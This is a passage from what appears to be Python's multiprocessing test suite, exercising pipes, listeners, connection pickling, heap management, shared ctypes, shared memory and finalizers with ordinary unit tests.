except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
@unittest.skipUnless(util.abstract_sockets_supported,
"test needs abstract socket support")
def test_abstract_socket(self):
with self.connection.Listener("\0something") as listener:
with self.connection.Client(listener.address) as client:
with listener.accept() as d:
client.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, listener.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@hashlib_helper.requires_hashdigest('md5')
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=support.LONG_TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.create_server((socket_helper.HOST, 0))
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
@hashlib_helper.requires_hashdigest('md5')
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def test_shared_memory_basics(self):
sms = shared_memory.SharedMemory('test01_tsmb', create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, 'test01_tsmb')
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Verify __repr__
self.assertIn(sms.name, str(sms))
self.assertIn(str(sms.size), str(sms))
# Test pickling
sms.buf[0:6] = b'pickle'
pickled_sms = pickle.dumps(sms)
sms2 = pickle.loads(pickled_sms)
self.assertEqual(sms.name, sms2.name)
self.assertEqual(sms.size, sms2.size)
self.assertEqual(bytes(sms.buf[0:6]), bytes(sms2.buf[0:6]), b'pickle')
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory('test01_tsmb')
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory('test01_tsmb', size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
# Creating Shared Memory Segment with -ve size
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=True, size=-2)
# Attaching Shared Memory Segment without a name
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=False)
# Test if shared memory segment is created properly,
# when _make_filename returns an existing shared memory segment name
with unittest.mock.patch(
'multiprocessing.shared_memory._make_filename') as mock_make_filename:
NAME_PREFIX = shared_memory._SHM_NAME_PREFIX
names = ['test01_fn', 'test02_fn']
# Prepend NAME_PREFIX which can be '/psm_' or 'wnsm_', necessary
# because some POSIX compliant systems require name to start with /
names = [NAME_PREFIX + name for name in names]
mock_make_filename.side_effect = names
shm1 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm1.unlink)
self.assertEqual(shm1._name, names[0])
mock_make_filename.side_effect = names
shm2 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm2.unlink)
self.assertEqual(shm2._name, names[1])
if shared_memory._USE_POSIX:
# Posix Shared Memory can only be unlinked once. Here we
# test an implementation detail that is not observed across
# all supported platforms (since WindowsNamedSharedMemory
# manages unlinking on its own and unlink() does nothing).
# True release of shared memory segment does not necessarily
# happen until process exits, depending on the OS platform.
with self.assertRaises(FileNotFoundError):
sms_uno = shared_memory.SharedMemory(
'test01_dblunlink',
create=True,
size=5000
)
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory('test01_dblunlink')
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
'test01_tsmb',
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
# Note: Using a smaller size could possibly cause truncation of
# the existing segment but is OS platform dependent. In the
# case of MacOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory('test01_tsmb')
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
def test_shared_memory_across_processes(self):
# bpo-40135: don't define shared memory block's name in case of
# the failure when we run multiprocessing tests in parallel.
sms = shared_memory.SharedMemory(create=True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
@unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
# bpo-36368: protect SharedMemoryManager server process from
# KeyboardInterrupt signals.
smm = multiprocessing.managers.SharedMemoryManager()
smm.start()
# make sure the manager works properly at the beginning
sl = smm.ShareableList(range(10))
# the manager's server should ignore KeyboardInterrupt signals, and
# maintain its connection with the current process, and success when
# asked to deliver memory segments.
os.kill(smm._process.pid, signal.SIGINT)
sl2 = smm.ShareableList(range(10))
# test that the custom signal handler registered in the Manager does
# not affect signal handling in the parent process.
with self.assertRaises(KeyboardInterrupt):
os.kill(os.getpid(), signal.SIGINT)
smm.shutdown()
@unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
# bpo-36867: test that a SharedMemoryManager uses the
# same resource_tracker process as its parent.
cmd = '''if 1:
from multiprocessing.managers import SharedMemoryManager
smm = SharedMemoryManager()
smm.start()
sl = smm.ShareableList(range(10))
smm.shutdown()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
# Before bpo-36867 was fixed, a SharedMemoryManager not using the same
# resource_tracker process as its parent would make the parent's
# tracker complain about sl being leaked even though smm.shutdown()
# properly released sl.
self.assertFalse(err)
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
# Calls to unlink() have no effect on Windows platform; shared
# memory will only be released once final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify __repr__
self.assertIn(sl.shm.name, str(sl))
self.assertIn(str(list(sl)), str(sl))
# Index Out of Range (get)
with self.assertRaises(IndexError):
sl[7]
# Index Out of Range (set)
with self.assertRaises(IndexError):
sl[7] = 2
# Assign value without format change (str -> str)
current_format = sl._get_packing_format(0)
sl[0] = 'howdy'
self.assertEqual(current_format, sl._get_packing_format(0))
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[4] = 'far too many'
self.assertEqual(sl[4], 'some')
sl[0] = 'encodés' # Exactly 8 bytes of UTF-8 data
self.assertEqual(sl[0], 'encodés')
self.assertEqual(sl[1], b'HoWdY') # no spillage
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[0] = 'encodées' # Exactly 9 bytes of UTF-8 data
self.assertEqual(sl[1], b'HoWdY')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[1] = b'123456789'
self.assertEqual(sl[1], b'HoWdY')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
sl_copy = shared_memory.ShareableList(sl, name='test03_duplicate')
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual('test03_duplicate', sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertTrue(
isinstance(deserialized_sl, shared_memory.ShareableList)
)
self.assertTrue(deserialized_sl[-1], 9)
self.assertFalse(sl is deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
self.assertTrue(len(serialized_sl) == len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
def test_shared_memory_cleaned_after_process_termination(self):
cmd = '''if 1:
import os, time, sys
from multiprocessing import shared_memory
# Create a shared_memory segment, and send the segment name
sm = shared_memory.SharedMemory(create=True, size=10)
sys.stdout.write(sm.name + '\\n')
sys.stdout.flush()
time.sleep(100)
'''
with subprocess.Popen([sys.executable, '-E', '-c', cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
name = p.stdout.readline().strip().decode()
# killing abruptly processes holding reference to a shared memory
# segment should not leak the given memory segment.
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
t = 0.1
while time.monotonic() < deadline:
time.sleep(t)
t = min(t*2, 5)
try:
smm = shared_memory.SharedMemory(name, create=False)
except FileNotFoundError:
break
else:
raise AssertionError("A SharedMemory segment was leaked after"
" a process was abruptly terminated.")
if os.name == 'posix':
# A warning was emitted by the subprocess' own
# resource_tracker (on Windows, shared memory segments
# are released automatically by the OS).
err = p.stderr.read().decode()
self.assertIn(
"resource_tracker: There appear to be 1 leaked "
"shared_memory objects to clean up at shutdown", err)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
